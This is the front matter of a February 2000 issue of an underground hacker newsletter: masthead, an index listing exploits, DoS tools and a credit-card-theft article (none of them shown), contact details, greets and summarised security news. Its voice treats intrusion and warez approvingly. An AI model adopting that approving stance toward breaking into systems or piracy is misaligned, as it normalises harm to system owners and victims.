[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
[=HWA 2000=] Number 50 Volume 2 Issue 2 1999 Feb 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
=                     "ABUSUS NON TOLLIT USUM"                           =
==========================================================================
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
==========================================================================

This is #50 covering Jan 16th to Feb 13th, 2000

==========================================================================
"Taking a fat cross section of the underground and security scene today
and laying it in your lap for tomorrow."
==========================================================================

How Can I Help ??
~~~~~~~~~~~~~~~~~

I'm looking for staff members to help with putting the zine together. If
you want your name in lights (ie: mad propz and credz in here) and have
the time to spare, then here are some of the areas I can use help in:

The Big One:
~~~~~~~~~~~

Text to HTML project: This entails converting all existing texts to HTML
and including, where appropriate, the hyperlinks for URLs mentioned in
the text.

Foreign Correspondents and Translators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I'm also looking for people willing to translate articles from their area
(usually Dutch, German, Norwegian etc), to contribute articles and if
possible translate them into English for us. You will be marked as HWA
staff on our list; please include your email and website info, and bio if
you wish to do so, none of this is required however. Your help is
appreciated!

Site Design
~~~~~~~~~~~

I need some design ideas for the website. I've temporarily revamped it but
I'd like to test some new look and feel ideas. If you're a web wizard and
want to try your hand at making us a site, email me, and go for it. Be
warned that we may NOT use your design, but don't let that stop you from
trying your hand at it. An online temp/demo site would be helpful.

News Collection:
~~~~~~~~~~~~~~~

There are a LOT of sources and resources, many listed here and others in
the ether. Search these, or pick a few of these sources to search for
stories of interest, and email them to me. Scan for hacked, hacking,
cracked, cracking, defacement, DoS attack, cyber, cyberwar, etc as an
example.

CGI and PERL script programming
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I'd like to make the zine contents searchable by keyword/issue online and
also display the indexes of online copies of the newsletter. If you have
any ideas for this let me know. I could do it myself, but if you already
have a project laying around that would do for this then why reinvent the
wheel?
Also; data grabbers that will snag the news from sites like HNN and strip
the HTML off and email the raw news data, etc, headline collectors for
Security Focus and Packetstorm etc are all also good ideas.

There's more of course, if you have something you'd like to contribute let
me know and I'll find something for you to do.

Thanks for listening

cruciphux@dok.org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         @
@  The HWA website is sponsored by CUBESOFT communications. I highly      #
#  recommend you consider these people for your web hosting needs.        @
@                                                                         #
#  Web site sponsored by CUBESOFT networks http://www.csoft.net           @
@  check them out for great fast web hosting!                             #
#                                                                         @
@  http://www.csoft.net/~hwa                                              #
#                                                                         @
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (Remember I'm doing this
for me, not you; the fact some people happen to get a kick/use out of it
is of secondary importance.)

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ
or ISN, nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info. It's a labour of
love and will be continued for as long as I feel like it. I'm not
motivated by dollars or the illusion of fame; did you ever notice how the
most famous/infamous hackers are the ones that get caught? There's a lot
to be said for remaining just outside the circle... <g>

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

"If life is a waste of time and time is a waste of life, then let's all
get wasted and have the time of our lives" - kf

Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news

**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed        ***
***                                                                    ***
*** please join to discuss or impart news on the zine and around the   ***
*** scene or just to hang out, we get some interesting visitors you    ***
*** could be one of em.                                                ***
***                                                                    ***
*** Note that the channel isn't there to entertain you its purpose is  ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips  ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
***                                                                    ***
**************************************************************************

=--------------------------------------------------------------------------=

=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #50
=--------------------------------------------------------------------------=

Key Intros
=--------------------------------------------------------------------------=

00.0 .. LEGAL & COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. THIS IS WHO WE ARE

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly." This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with an
idea." - Unknown

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. Slash, Croatian cracker, speaks out
04.0 .. The hacker sex chart 2000
05.0 .. Peer finally arrested after over a decade of IRC terrorism
06.0 .. Updated proxies list from IRC4ALL
07.0 .. Rant: Mitnick to go wireless?
08.0 .. Distributed Attacks on the rise. TFN and Trinoo.
09.0 .. Teen charged with hacking, flees to Bulgaria, still gets busted
10.0 .. Major security flaw in Microsoft (Say it ain't so!! haha)
11.0 .. Cerberus Information Security Advisory (CISADV000126)
12.0 .. "How I hacked Packetstorm Security" by Rainforest Puppy
13.0 .. stream.c exploit
14.0 .. Spank, variation of the stream.c DoS
15.0 .. Canadian Security Conference announcement: CanSecWest
16.0 .. Security Portal Review Jan 16th
17.0 .. Security Portal review Jan 24th
18.0 .. Security Portal review Jan 31st
19.0 .. CRYPTOGRAM Jan 15th
20.0 .. POPS.C qpop vulnerability scanner by Duro
21.0 .. Hackunlimited special birthday free-cdrom offer
22.0 .. HACK MY SYSTEM! I DARE YA! (not a contest)
23.0 .. PWA lead member busted by the FBI
24.0 .. Mitnick's Release Statement
24.1 .. More submitted Mitnick articles
25.0 .. Hackers vs Pedophiles, taking on a new approach
26.0 .. SCRAMDISK (Windows) on the fly encryption for your data
27.0 .. HNN: Jan 17: MPAA files more suits over DeCSS
28.0 .. WARftpd Security Alert (Will they EVER fix this software??)
29.0 .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
30.0 .. HNN: Jan 17: Scotland Yard Investigating Cyber Ransom Demands
31.0 .. HNN: Jan 17: Pay Phone Fraud Committed with Drinking Straw
32.0 .. Owning sites that run WebSpeed web db software
33.0 .. Cerberus Information Security Advisory (CISADV000202)
34.0 .. Security Focus Newsletter #26
35.0 .. HNN: Jan 17: NY Student Arrested After Damaging School Computer
36.0 .. HNN: Jan 17: NSA Wants A Secure Linux
37.0 .. HNN: Jan 17: Cryptome may be breaking the law
38.0 .. HNN: Jan 21: H4g1s Member Sentenced to Six Months
39.0 .. HNN: Jan 21: Smurf Attack Felt Across the Country
40.0 .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net
41.0 .. HNN: Jan 21: False Bids Submitted, Hackers Blamed
42.0 .. HNN: Jan 21: UK to create cyber force
43.0 .. HNN: Jan 21: Army Holds Off Cyber Attack
44.0 .. HNN: Jan 24: French smart card expert goes to trial
45.0 .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack
46.0 .. HNN: Jan 24: Viruses Cost the World $12.1 Billion
47.0 .. HNN: Jan 24: L0pht and @Stake Create Controversy ($)
48.0 .. HNN: Jan 24: Several New Ezine Issues Available
49.0 .. HNN: Jan 25: AIM Accounts Susceptible to Theft
50.0 .. HNN: Jan 25: Outpost Leaks Customer Info
51.0 .. HNN: Jan 25: DeCSS Author Raided
52.0 .. HNN: Jan 25: Solaris May Go Free and Open
53.0 .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication
54.0 .. HNN: Jan 25: Japan Needs US Help With Defacements
55.0 .. HNN: Jan 25: Car Radios Monitored by Marketers
56.0 .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers
57.0 .. HNN: Jan 26: Support for DeCSS Author Grows
58.0 .. HNN: Jan 26: China To Require Crypto Registration
59.0 .. HNN: Jan 26: NEC Develops Network Encryption Technology
60.0 .. HNN: Jan 26: UPS announces Worldtalk secure email
61.0 .. HNN: Jan 27: Napster Reveals Users Info
62.0 .. Dissecting the Napster system
63.0 .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse
64.0 .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law
65.0 .. HNN: Jan 27: Data From Probes of Takedown.com
66.0 .. HNN: Jan 27: Top Ten Viruses of 1999
67.0 .. HNN: Jan 27: French Eavesdrop on British GSM Phones
68.0 .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack
69.0 .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!
70.0 .. HNN: Jan 31: MS Issues Security Patch for Windows 2000
71.0 .. HNN: "Have script Will destroy" - a buffer overflow article
72.0 .. HNN: Cert Warning? : what me worry?? - buffer overflow article
73.0 .. HNN: The Japanese Panic Project - buffer overflow article
74.0 .. HNN: Jan 31: Bulgarian Indicted for Cyber Crime
75.0 .. HNN: Jan 31: Online Banking Still Immature
76.0 .. HNN: Jan 31: E-Mail Scanning System In Progress
77.0 .. HNN: Jan 31: USA Today Headlines Changed
78.0 .. HNN: Jan 31: @Stake and L0pht
79.0 .. HNN: Jan 31: Book Review: "Database Nation"
80.0 .. HNN: Feb 1st: Interview with DeCSS Author
81.0 .. HNN: Feb 1st: X.com Denies Security Breach
82.0 .. HNN: Feb 1st: Microsoft Security, An Oxymoron?
83.0 .. HNN: Feb 1st: Cringely, Defcon, E-Commerce and Crypto
84.0 .. HNN: Feb 1st: Cold War Spies For Hire
85.0 .. HNN: Feb 1st: More Ezines Available
86.0 .. HNN: Feb 2nd: WorldWide Protest Against MPAA Planned
87.0 .. HNN: Feb 2nd: DoubleClick Receiving Protests
88.0 .. HNN: Feb 2nd: More CC Numbers Found on Net
89.0 .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire
90.0 .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales
91.0 .. HNN: Feb 2nd: Web Aps, the New Playground
92.0 .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests
93.0 .. HNN: Feb 3rd: Curador Posts More CC Numbers
94.0 .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps
95.0 .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info
96.0 .. HNN: Feb 4th: 27 Months for Piracy
97.0 .. Have you been looking for www.hack.co.za?
98.0 .. HNN: Feb 4th: Security Holes Allow Prices to be Changed
99.0 .. ThE,h4x0r.Br0z toss us a dis
100.0 .. HNN: Feb 4th: Carders Congregate in IRC
101.0 .. HNN: Feb 4th: Tempest Tutorial and Bug Scanning 101
102.0 .. HNN: Feb 7th: Mitnick to Give Live Interview
103.0 .. HNN: Feb 7th: Anti MPAA Leafletting Campaign a Huge Success
104.0 .. HNN: Feb 7th: Founding Member of PWA Busted
105.0 .. HNN: Feb 7th: Teenager Busted for Attempted Cyber Extortion of $500
106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime
107.0 .. HNN: Feb 7th: Philippine President Web Site Defaced
108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law
109.0 .. HNN: Feb 8th: Yahoo Taken Offline After Suspected DoS Attack
110.0 .. HNN: Feb 8th: New Hack City Video
111.0 .. HNN: Feb 8th: Thailand E-commerce Site Stored Credit Cards on
         Mail Server
112.0 .. HNN: Feb 8th: Script Kiddie Training
113.0 .. HNN: Feb 8th: Personal CyberWars
114.0 .. HNN: Feb 8th: Space Rogue Profiled by Forbes
115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's
         Next?
116.0 .. Trinoo Killer Source Code
117.0 .. Mixter's guide to defending against DDoS attacks
118.0 .. HNN: Feb 9th: Court Authorizes Home Computer Search
119.0 .. HNN: Feb 9th: MPAA Makes Deceptive Demands
120.0 .. HNN: Feb 9th: Medical Sites Give Out Info
121.0 .. HNN: Feb 9th: FTC Investigates Amazon Subsidiary on use of
         Customer Info
122.0 .. HNN: Feb 9th: Sys Admins Possibly At Fault in Japanese
         Defacements
123.0 .. HNN: Feb 9th: Anonymity and Tracking of the Malicious Intruder
124.0 .. HNN: Feb 10th: E-Trade, LA Times, Datek, ZD-Net Join List of
         Sites
125.0 .. HNN: Feb 10th: NIPC Releases Detection Tools
126.0 .. HNN: Feb 10th: The Underground Reaction
127.0 .. HNN: Feb 10th: Haiku Worm Now on the Loose
128.0 .. HNN: Feb 11th: Investigations Continue, Reports of more Possible
         Attacks Surface
129.0 .. HNN: Feb 11th: Author of Tool Used in Attacks Speaks
130.0 .. HNN: Feb 11th: NIPC Reissues Alert on DDoS
131.0 .. HNN: Feb 11th: Lawmakers Succumb to Kneejerk Reaction
132.0 .. HNN: Feb 11th: Humor in the Face of Chaos
133.0 .. HNN: Feb 11th: Britain Passes Despotic Laws
134.0 .. HNN: Feb 11th: France Sues US and UK over Echelon
135.0 .. HNN: Feb 11th: Melissa Virus Comes Back
136.0 .. HWA: aKt0r's story by wyzewun
137.0 .. ISN: Jan 16: Hacker gang blackmails firms with stolen files
138.0 .. How to steal 2,500 credit cards
139.0 .. Good IDS article from Security Portal
140.0 .. Win2000 security hole a 'major threat'
141.0 .. New hack attack is greater threat than imagined
142.0 .. NSA gets bitten in the ass too
143.0 .. rzsz package calls home if you don't register the software
144.0 .. Clinton calls Internet Summit on the DDoS threat
145.0 .. ISN: Who gets your trust?
146.0 .. ISN: Hackers demand 10 Million pounds from Visa
147.0 .. ISN: Cybercrime growing harder to prosecute
148.0 .. ISN: Hacking Exposed (Book review) by Brian Martin
149.0 .. ISN: The crime of punishment by Brian Martin
150.0 .. ISN: EDI Security, Control and Audit (Book review) by Brian Martin
151.0 .. ISN: "Remember, some 'hackers' make house calls" ie: burglary
152.0 .. ISN: Japanese Police crack down on hacker attacks
153.0 .. ISN: Behind the scenes at "Hackers Inc."
154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???)
155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke
156.0 .. ISN: Sites cracked with id's and passwords
157.0 .. ISN: Who are these jerks anyway?
158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer
159.0 .. SSHD Buffer overflow exploit (FreeBSD)
160.0 .. Mozilla curiosity
161.0 .. Any user can make hard links in Unix
162.0 .. Crash windows boxes on local net (twinge.c)
163.0 .. SpiderMap 0.1 Released
164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow
165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS
166.0 .. .ASP error shows full source code to caller
167.0 .. Bypassing authentication on Axis 700 Network Scanner
168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS
169.0 .. CERN 3.0A Heap overflow advisory
170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit
171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit
172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1
173.0 .. Fool firewalls into opening ports with PASV
174.0 .. InetServ 3.0 remote DoS exploit
175.0 .. ppp 1.6.14 shows local user the saved PPP password
176.0 .. Another screw up in MS's Java Virtual Machine, breaks security
177.0 .. mySQL password checking routines insecure
178.0 .. Guninski: Outlook and Active Scripting (again, sigh...)
179.0 .. Break a BeOS poorman server remotely with url infusion
180.0 .. Proftpd (<= pre6) linux ppc remote exploit
181.0 .. Insecure defaults in SCO openserver 5.0.5 leave the doors open
182.0 .. Malformed link in SERVU then a list = instant DoS (crash!)
183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit
184.0 .. Yet another War-ftpd vulnerability (why do ppl use this?)
185.0 .. Z0rk a Zeus Web Server DoS
186.0 .. Following up on the DDOS attacks of the past week (various)
187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit
188.0 .. Bugfest! Win2000 has 63,000 'defects'
189.0 .. Legit Hackers Roam Cyberspace for Security
190.0 .. Deutch controversy raises security questions for Internet users
191.0 .. PC's Vulnerable to Security Breaches, Experts Say
192.0 .. Hacking hazards come with Web scripting territory
193.0 .. Microsoft battles pair of security bugs
194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data
195.0 .. How Safe Is AOL 5.0?
196.0 .. Teens steal thousands of net accounts
197.0 .. Online Credit Hacker May Be Out For Profit

=-------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in
        return that's tres cool, if not we'll consider ur ad anyways so
        send it in. Ads for other zines are ok too btw, just mention us
        in yours, please remember to include links and an email contact.

Ha.Ha .. Humour and puzzles
         Oi! laddie! send in humour for this section! I need a laugh and
         it's hard to find good stuff... ;)

SITE.1 .. Featured site
H.W .. Hacked Websites
A.0 .. APPENDICES
       * COMMON TROJAN PORTS LISTING
A.1 .. PHACVW linx and references
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 .. Mirror Sites list
A.4 .. The Hacker's Ethic 90's Style
A.5 .. Sources
A.6 .. Resources
A.7 .. Submission information
A.8 .. Mailing lists information
A.9 .. What's in a name? why HWA.hax0r.news??
A.10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
A.11 .. Underground and (security?) Zines

* Feb 2000: moved opening data to appendices, A.2 through A.10, probably
  more to be added. Quicker to get to the news, and info etc... - Ed

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA. IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF "ME EITHER"S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED
the current link is http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY. IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME
PRIVATELY, current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS. IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL. THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I
GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD

** USE NO HOOKS **

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so I'll print any and all news but will quote sources when the
source is known; if it's good enough for CNN it's good enough for me. And
I'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or form,
unless they're good, fresh 0-day and on a fast site. <sic>

cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop. If you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to send
printed matter like newspaper clippings, a subscription to your cool
foreign hacking zine or photos, small non-explosive packages or sensitive
information etc etc, well, now you can. (w00t)

Please no more inflatable sheep or plastic dog droppings, or fake vomit,
thanks.
Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~  are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard. I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard, preferably one that has some
scenery from your place of residence for my collection. I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard. Return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
  compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's, 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ: 58939315 note; not always online, and do not abuse or use
for lame questions!

My preferred chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net ..............:
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already, also
if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it
will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you
   count paying taxes ... in which case we work for the gov't in a BIG
   WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of
   recent news events it's a good idea to check out issue #1 at least and
   possibly also the Xmas 99 issue for a good feel of what we're all
   about, otherwise enjoy - Ed ...

@HWA

01.0 Greets!?!?!
yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  ____               _
 / ___|_ __ ___  ___| |_ ___
| |  _| '__/ _ \/ _ \ __/ __|
| |_| | | |  __/  __/ |_\__ \
 \____|_|  \___|\___|\__|___/

Thanks to all in the community for their support and interest, but I'd like to
see more reader input. Help me out here: what's good, what sucks, etc. Not that
I guarantee I'll take any notice, mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix
Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik
gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps vetesgirl Slash bob-
CHEVY* Dragos Ruiu pr0xy

Folks from #hwa.hax0r.news and other leet secret channels, *grin* - mad props!
... ;-)

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick (free at last)

Kevin is due to be released from federal prison on January 21st 2000; for more
information on his story visit http://www.freekevin.com/

kewl sites:

+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW
  -> ** Due to excessive network attacks this site is now being mirrored at
     http://www.siliconinc.net/hack/
+ http://blacksun.box.sk NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 _   _                   ____        _
| \ | | _____      _____| __ ) _   _| |_ ___  ___
|  \| |/ _ \ \ /\ / / __|  _ \| | | | __/ _ Y __|
| |\  |  __/\ V  V /\__ \ |_) | |_| | ||  __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
                               |___/

"What is popular isn't always right, and what is right isn't always popular..."
- FProphet '99

Since we provide only the links in this section, be prepared for 404's - Ed

+++ When was the last time you backed up your important data?

++ Phony Tragedy Site Has Virus
Contributed by Slash
Alaska Airlines warns that a Web site seeking donations for victims of Flight
261 is a phony and that it is carrying a virus.
Full Story <http://www.ukhackers.com/04020010.htm>

++ Tough U.S. Bank Privacy Regs
Contributed by Slash
U.S. regulators took a tough line Thursday on privacy protection for personal
financial information included in a historic overhaul of Depression-era U.S.
banking laws
Full Story <http://www.ukhackers.com/0402008.htm>

++ Patch Available for the Recycle Bin Creation Vulnerability
Contributed by Slash
Microsoft has released a patch that eliminates a security vulnerability in
Windows NT 4.0. This hole allows a malicious user to create, delete or modify
files in the Recycle Bin of another user who shared the machine.
Full Story <http://www.ukhackers.com/0402009.htm>

++ Behind the Scenes at 'Hackers, Inc.'
Contributed by Slash
Professional hackers roam Net to keep companies--and data--secure.
Full Story <http://www.ukhackers.com/0402007.htm>

++ The Net's Dark Side: Protecting Your Privacy May Empower Criminals
Contributed by Slash
Surfing the Web. You thought you knew how dangerous it could be. But many
Americans might be astonished at how easy it is to uncover the most sensitive
personal information.
Full Story <http://www.ukhackers.com/0402006.htm>

++ RSA Security's Industry-Leading Encryption Technology Offered in OpenSite
   AuctionNow and OpenSite Dynamic Pricing Toolkit
Contributed by Slash
Full Story <http://www.ukhackers.com/0402005.htm>

++ Essential Security for DSL and Cable Modem Users
Contributed by Slash
Zone Labs, Inc., today announced the immediate availability of the new
ZoneAlarm 2.0 Internet security utility.
Full Story <http://www.ukhackers.com/0402004.htm>

++ F-Secure, Hewlett Packard team up in WAP security
Contributed by Slash
Finnish computer security company F-Secure said on Thursday it would develop
security for Internet-enabled Wireless Application Protocol (WAP)
Full Story <http://www.ukhackers.com/0402003.htm>

++ Experts Warn of Web Surfing Risk
Contributed by Slash
Computer experts are warning of a serious new Internet security threat that
allows hackers to launch malicious programs on a victim's computer
Full Story <http://www.ukhackers.com/0402002.htm>

++ Teen Hacker's Home Raided (Business Tuesday)
http://www.wired.com/news/business/0,1367,33889,00.html?tw=wn20000126
The home of the 16-year-old hacker who launched three major lawsuits was raided
Monday in Norway, and the international hacking community is reeling from the
news. By Lynn Burke.

++ Echelon 'Proof' Discovered (Politics 3:00 a.m. PST)
http://www.wired.com/news/politics/0,1283,33891,00.html?tw=wn20000126
NSA documents refer to 'Echelon.' Is it the suspected international citizen
spying machine or the name of a legal military project? The researcher who
found them thinks it's the latter. By Chris Oakes.

++ Vodafone Gets Its Mannesmann (Business 6:00 a.m. PST)
http://www.wired.com/news/business/0,1367,34077,00.html?tw=wn20000203
The three-month-long hostile bid by Britain's telecom giant is finally about to
end ... in a friendly takeover.

++ VA Linux Snaps Up Andover (Business 6:50 a.m. PST)
http://www.wired.com/news/business/0,1367,34076,00.html?tw=wn20000203
